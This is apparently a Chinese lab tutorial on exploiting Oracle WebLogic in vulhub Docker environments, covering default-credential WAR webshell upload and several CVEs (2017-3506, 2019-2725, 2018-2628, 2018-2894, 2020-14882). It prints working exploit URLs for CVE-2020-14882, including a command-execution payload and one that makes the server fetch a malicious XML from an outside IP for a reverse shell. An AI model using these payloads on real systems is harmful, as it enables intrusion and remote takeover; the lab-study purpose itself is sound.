WebLogic中间件常见漏洞

一、后台弱⼝令GetShell

1.环境搭建

cd vulhub-master/weblogic/weak_password

docker-compose up -d

2.访问网站并登陆后台

/console/login/LoginForm.jsp 默认账号密码:weblogic/Oracle@123

3.点击部署,点击安装,点击上传文件

4.上传war包,jsp⽊⻢压缩成zip,修改后缀为war,上传

然后⼀直下⼀步,直到完成

5. 访问部署好的war

二、CVE-2017-3506

1.环境搭建

cd vulhub-master/weblogic/weak_password

docker-compose up -d

2. 验证是否存在wls-wsat组件

/wls-wsat/CoordinatorPortType

3.在当前页面抓包之后,添加下⾯请求包,反弹shell

三、 CVE-2019-2725

1.漏洞验证 ,访问/_async/AsyncResponseService 如果出现以下页面,则说明存在漏洞

2.在当前页面抓包 , 修改请求包 , 写⼊shell

3.访问下载到weblogic服务器上的木马,并进行连接

四、 CVE-2018-2628

1.环境搭建

cd vulhub-master/weblogic/CVE-2018-2628

docker-compose up -d

2. 访问网站

3. 利用工具

五、 CVE-2018-2894

1.环境搭建

cd vulhub-master/weblogic/CVE-2018-2894

docker-compose up -d

2. 访问/console/login/LoginForm.jsp,获取密码: docker-compose logs | grep password

3.设置web服务测试开启: 域结构 -> base-domain -> 高级 -> 启动Web服务测试页

3.点击保存 , 进⼊ config.do ⽂件进⾏设置,将⽬录设置为 ws_utc 应⽤的静态⽂件css⽬录,访问这个⽬ 录是⽆需权限的,这⼀点很重要

访问/ws_utc/config.do

/u01/oracle/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/com.oracle.w ebservices.wls.ws-testclient-app-wls/4mcj4y/war/css

4. 点击安全 , 点击添加

右键审查元素 , 找到对应时间戳

5.工具连接

/ws_utc/css/config/keystore/1726815031601_2.jsp

六、 CVE-2020-14882

1.环境搭建

cd vulhub-master/weblogic/CVE-2020-14882

docker-compose up -d

2.访问管理控制台

/console/login/LoginForm.jsp

3. 使⽤以下url绕过登录认证

/console/css/%252e%252e%252fconsole.portal

4.首先访问以下 URL http://121.40.229.129:7001/console/css/%252e%252e%252fconsole.portal? _nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession("java.lang.Runti me.getRuntime().exec('touch%20/tmp/success');")

进⼊到docker中可以看到命令已经成功运⾏了

**方式二:1.**制作⼀个恶意XML⽂件,将其提供到Weblogic可以访问得服务器上

2.然后通过以下 URL,Weblogic 将加载此 XML 并执⾏其中的命令

http://192.168.190.134:7001/console/css/%252e%252e%252fconsole.portal? _nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.File SystemXmlApplicationContext("http://121.40.229.129:7001/1.xml")

成功接收到反弹的shell

相关推荐
BullSmall8 小时前
第三方软件安全-Dependency‑Track Docker 部署
安全·docker·容器
AImatters8 小时前
国产算力底座,支撑油气储运数字化迈过关键分水岭
安全·cpu·算力·海光·油气储运
叠叠乐11 小时前
中国移动家庭云电脑window关闭所有安全脚本
安全
Jmyd012311 小时前
实训室的 3D 模型涉及肖像文物,数据安全与合规怎么做?
安全·3d·数据安全·虚拟实训
芯盾时代12 小时前
《金融业网络安全管理办法(征求意见稿)》全条款深度拆解(三)
网络·安全·网络安全
敢敢是只喵i12 小时前
一个本地 AI Agent 要操作多个门店或 SaaS 账号,应该怎样安全切换身份?
人工智能·安全·ai·系统架构·业界资讯
Acrel123413 小时前
DC800V 大规模落地,算力机房安全该如何保障
安全
其实防守也摸鱼14 小时前
权限提升与横向移动:从内网渗透到域控的完整技术图谱
运维·服务器·数据库·安全·github·copilot·渗透
深圳海导科技14 小时前
资产防盗追踪系统:物联网高价值资产安全管理|海导科技navynav
科技·物联网·安全
波多利希最高礼仪的握力器14 小时前
安全复制SCP
linux·服务器·安全